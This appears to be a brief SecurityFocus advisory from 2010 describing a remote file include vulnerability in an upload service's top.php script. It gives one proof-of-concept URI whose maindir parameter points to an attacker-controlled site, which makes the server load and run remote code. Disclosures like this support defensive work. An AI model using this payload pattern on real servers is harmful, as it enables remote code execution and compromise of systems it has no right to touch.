Upload Service Top.PHP Remote File Include Vulnerability

Attackers can exploit this issue through a web client.

The following proof-of-concept URI is available:

http://example.com/upload/top.php?maindir=http://example.com/attacker's site?


 

Privacy Statement
Copyright 2010, SecurityFocus